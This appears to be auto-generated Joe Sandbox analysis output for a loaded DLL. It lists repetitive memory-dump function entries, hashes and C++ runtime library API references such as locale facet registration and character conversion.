Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
Instruction ID: 7624d2fd8d0dbc0651cbef8b4529f7c1278a29cac0ae02a43c025bbc50aa34c0
Opcode Fuzzy Hash: 6476b8c762631364781cd38094cf18bfc38da94108dc080aa45f3d1f461903ff
Instruction Fuzzy Hash: 8311E77A91461ECBCF00DBE0C894EFDB7BBAF44B14F140909E510AB390DBB49A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B7F2, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21B7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B803
int.LIBCPMT ref: 6E21B81A

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

messages.LIBCPMT ref: 6E21B83D
std::_Facet_Register.LIBCPMT ref: 6E21B854
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B874
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B892

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
Instruction ID: fa31074f765baaf55ad792064010492f97346163ee0330b65fad62241eb71be0
Opcode Fuzzy Hash: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
Instruction Fuzzy Hash: 8311E079D0451ECBCF00EBE4C894AEDB7BBBF48B18F150919E510AB390DBB49A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F567, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F56E
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F578
int.LIBCPMT ref: 6E20F58F

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F5B2
std::_Facet_Register.LIBCPMT ref: 6E20F5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F607

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
Instruction ID: 4430a788135ba6fe5c0d3a1d7bd1b584371bfa209c41759e8d9901a041af72ae
Opcode Fuzzy Hash: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
Instruction Fuzzy Hash: 4E11067991051E8FCF05DFE4C894AEEB77BBF94718F240918E4216B2D0DB749A84C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A2F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20A2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
int.LIBCPMT ref: 6E20A319

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

numpunct.LIBCPMT ref: 6E20A33C
std::_Facet_Register.LIBCPMT ref: 6E20A353
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A391

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
Instruction ID: 7e277367ff80e61130ca7e8184fd0f73f595a43bfe6d12f322f8be67388d697a
Opcode Fuzzy Hash: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
Instruction Fuzzy Hash: 2A1106B591052D8FCF04DBE0C898AEDB77BAF45714F540908E5106B2D0DF74AA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A059, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20A060
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A06A
int.LIBCPMT ref: 6E20A081

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

codecvt.LIBCPMT ref: 6E20A0A4
std::_Facet_Register.LIBCPMT ref: 6E20A0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A0F9

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
Instruction ID: 962cb3cc37723b47a9a2c980b112aa3f0b7d4fa8a928716d4613960256540487
Opcode Fuzzy Hash: fb2974a2acd57bbc508ef8313825e0e52bf9b456f86d2aebb9acbe63624bdece
Instruction Fuzzy Hash: 9111C6B691052DDBCF01DBE4C898AEDB77BBF44B15F544908E4106B2D0DFB49A48C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F183, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F18A
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F194
int.LIBCPMT ref: 6E20F1AB

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

messages.LIBCPMT ref: 6E20F1CE
std::_Facet_Register.LIBCPMT ref: 6E20F1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F205
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F223

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
Instruction ID: 649ac8905262ea0ce9a5533c418bffb154387899aa8052279c3b24696cb4d61b
Opcode Fuzzy Hash: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
Instruction Fuzzy Hash: A511E37A90051DCFCF00DBE0C898AEEB77BBF84719F240909E4206B2D0DBB49A80C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E25621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E23F290,6E23F290,?,?,?,6E256470,00000001,00000001,C5E85006), ref: 6E256279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E256470,00000001,00000001,C5E85006,?,?,?), ref: 6E2562FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2563F9
__freea.LIBCMT ref: 6E256406

Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

__freea.LIBCMT ref: 6E25640F
__freea.LIBCMT ref: 6E256434

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cc5d21a5bbbaa761c004109d38bd150b7d22b6af735e1eeac75bbbd27a60b69c
Instruction ID: c0875fdc6f949447c3dd43aeb7607c4dbc10faf2bd5cc5e17263358a06b767a1
Opcode Fuzzy Hash: cc5d21a5bbbaa761c004109d38bd150b7d22b6af735e1eeac75bbbd27a60b69c
Instruction Fuzzy Hash: 4251C47262021BAFEB258FE4CD90EBB77ABEB44750F154669EC14DA240DF34DC61C690

Uniqueness

Uniqueness Score: -1.00%

Function 6E2242C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E223EDB,6E21FA25,6E21FD54,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E), ref: 6E2242D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2242E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2242FD
SetLastError.KERNEL32(00000000,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E22434F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
Instruction ID: f1dbadee7f91d3c947d3c483ba98e15bbc5920e0da9bb9bb820dfe588d201991
Opcode Fuzzy Hash: 11ca3798cb17ab8f4ad984dd8a1ade486fa50c10c5678894769fdd25300c3403
Instruction Fuzzy Hash: 4201703615DB2B5FD78405F5AC9DA97376BEB17B7A330833AF014850D8EF528802C190

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20FA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FAA8
int.LIBCPMT ref: 6E20FABF

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FB37

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
Instruction ID: f404a529c8d1b5821af0a7ab00ac64639aab1fa7b517d80822bcfb7494d569a5
Opcode Fuzzy Hash: 0d2e6529828d6831b67168bd0fa987845102d9951ce64d97a50c9e9ae958fe24
Instruction Fuzzy Hash: DA11067AA0051E8FCF00DBE0C894AEEB77BBF44B14F244919E4116B2D0DF749A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20FB44
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FB4E
int.LIBCPMT ref: 6E20FB65

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FBDD

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
Instruction ID: 78c16c7cfdeef293c5514b18c1c363ef952ffcb74cea5a6842a6c889fabdd728
Opcode Fuzzy Hash: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
Instruction Fuzzy Hash: 5611067690051E9BCF04DBE4C898AEEB77BAF48B14F240909E511AB2D0DBB49A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20FBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20FBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FBF4
int.LIBCPMT ref: 6E20FC0B

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20FC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FC83

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
Instruction ID: d1e7b642812f5fe2d79606500f628ac9fe5a98729226613b93c8deb2ffc433f1
Opcode Fuzzy Hash: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
Instruction Fuzzy Hash: 9311067590051D9BCF40DBE0C894EEEB77BBF44B14F240909E8106B2D0DFB49A44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B898, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21B89F
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B8A9
int.LIBCPMT ref: 6E21B8C0

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21B8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B938

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
Instruction ID: d08d6b302eae1b797f4fb565c8de8d8823559af4b1c173fd64c924e421521c79
Opcode Fuzzy Hash: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
Instruction Fuzzy Hash: B811CE7991451ECBCF04DBE0C894AEDB7BBBF44B14F140919E510AB390DBB89E41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21B945
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B94F
int.LIBCPMT ref: 6E21B966

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21B9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B9DE

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
Instruction ID: b30431928973617535b6f04673bde7e034cd3064f742672db61ea0d389a179d7
Opcode Fuzzy Hash: 12d9f1bb7d0f9f2ca665b1fbe3dd440f4633d0f2298e9e35950886ecf55a60fe
Instruction Fuzzy Hash: 5F11BC7990451ECBCB04EBE0C894AEDB7BBBF44B14F140919E510AB390DBB49E45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F952
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F95C
int.LIBCPMT ref: 6E20F973

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F9EB

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
Instruction ID: ce6fa70b025c62a46b7333a44e3d8e80089853d9f02c56ddcf649cf6b11fcda8
Opcode Fuzzy Hash: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
Instruction Fuzzy Hash: DF11C17991052D9BCB00EBE0C894AEEB77BBF44B18F244909E4106B2D0DB74AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204747, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20474E
std::_Lockit::_Lockit.LIBCPMT ref: 6E204758
int.LIBCPMT ref: 6E20476F

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E2047A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E2047BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E2047DD

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
Instruction ID: 6873a31d7f9ff45d95f5d602d1511cfdbbcd75cbc473d54ac18203b7e4455c53
Opcode Fuzzy Hash: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
Instruction Fuzzy Hash: 3111E379E0051D9FCB05DBE0C854AEDB7BAAF15714F108918E524AB2D0DBB49A45C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F806
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F810
int.LIBCPMT ref: 6E20F827

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F861
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F881
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F89F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
